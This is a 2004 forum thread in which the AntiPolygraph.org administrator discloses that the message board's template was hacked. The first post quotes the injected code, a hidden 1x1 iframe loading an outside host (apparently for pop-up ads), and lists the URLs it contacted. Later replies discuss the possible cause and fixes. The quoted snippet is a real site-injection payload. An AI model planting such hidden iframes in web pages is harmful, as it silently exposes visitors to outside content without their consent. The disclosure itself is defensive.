AntiPolygraph.org Message Board - AntiPolygraph.org Message Board Hacked

(UTC)

Welcome, Guest. Please Login or Register

News:

You can enhance your privacy when browsing and posting to this forum by using the free and open source Tor Browser and posting as a guest (using a fake e-mail address such as nobody@nowhere.com) or registering with a free, anonymous ProtonMail e-mail account. Registered users can exchange private messages with other registered users and receive notifications.

In addition, check out our live chat server.

AntiPolygraph.org Message Board › Polygraph and CVSA Forums › Action Alerts and Announcements › AntiPolygraph.org Message Board Hacked

(Moderator: Administrator)

‹ Previous Topic | Next Topic ›

Pages: 1

Add Poll

Send Topic

AntiPolygraph.org Message Board Hacked (Read 4482 times)

Administrator Administrator Offline Posts: 343 Joined: Sep 28^th, 2000	AntiPolygraph.org Message Board Hacked Jun 6^th, 2004 at 3:47am	Mark & Quote Quote Print Post
	On 2 June 2004 at 11:28 hrs Pacific Daylight Time, the AntiPolygraph.org message board's template file was modified without authorization by an unknown person. The following text was inserted into the file: <div style="visibility: hidden; position: absolute; left: 1; top: 1"><iframe src="http://re6.net/?s=1" frameborder=0 vspace=0 hspace=0 width=1 height=1 marginwidth=0 marginheight=0 scrolling=no></iframe></div> This code would cause a number of outside URLs to be contacted each time any page on the message board was loaded. Its intended purpose seems to be to deliver pop-up advertisements. Among the URLs that would automatically be contacted are: http://re6.net/?s=1 http://sowor.ru http://wall.sowor.ru/?tfnop=mgetx The added code was removed on 5 June 2004 at 17:07 hrs PDT. We are researching this incident and taking measures to prevent a re-occurrence.
	« Last Edit: Jun 6^th, 2004 at 4:13am by Administrator »
	AntiPolygraph.org Administrator
	Facebook Twitter YouTube IP Logged

Administrator Administrator Offline Posts: 343 Joined: Sep 28^th, 2000	Re: AntiPolygraph.org Message Board Hacked Reply #1 - Jun 6^th, 2004 at 4:17am	Mark & Quote Quote Print Post
	Similar hacking incidents have been reported on other websites. See: http://forums.hostreflex.com/showthread.php?p=1029#post1029 http://forums.eqdkp.com/index.php?showtopic=885

	AntiPolygraph.org Administrator
	Facebook Twitter YouTube IP Logged

macagent New User Offline Posts: 1 Joined: Sep 23^rd, 2004	Re: AntiPolygraph.org Message Board Hacked Reply #2 - Sep 23^rd, 2004 at 5:02am	Mark & Quote Quote Print Post
	I have seen this exact same thing happen to my site. Did you ever find out what happened and how to prevent it?


	IP Logged

Administrator Administrator Offline Posts: 343 Joined: Sep 28^th, 2000	Re: AntiPolygraph.org Message Board Hacked Reply #3 - Sep 23^rd, 2004 at 9:05am	Mark & Quote Quote Print Post
	No, it is not clear how the template file was modified, though it may have been through a security flaw involving Macromedia Flash files. We disabled flash. In addition, if you are running YaBB, you can upgrade to version 1.3.2, which includes security fixes.

	AntiPolygraph.org Administrator
	Facebook Twitter YouTube IP Logged

Pages: 1

Add Poll

Send Topic

‹ Previous Topic | Next Topic ›

AntiPolygraph.org Message Board Hacked

Name:
E-mail:
Your Verification Code is:	Please type the characters that appear in the image. The characters must be typed in the same order, and they are case-sensitive.
Verification Code:
Preview

Message Icon:

Subject:

Message:
You can resize the textbox by dragging the right or bottom border.

Max 200000 characters. Remaining characters:

Text size: pt

More Smilies

View All Smilies

Collapse/Expand additional features

Attachments More Attachments

Allowed file types: txt doc docx ics psd pdf bmp jpe jpg jpeg gif png swf zip rar tar gz 7z odt ods mp3 mp4 wav avi mov 3gp html maff pgp gpg
Maximum Attachment size: 500000 KB

Attachment 1:

Attachment 2:

Attachment 3:

Attachment 4:

Attachment 5:

Attachment 6:

Attachment 7:

Attachment 8:

Attachment 9:

Attachment 10:

Disable UBBC and Smilies:

Check this if you wish to disable parsing of ubbc tags and smilies.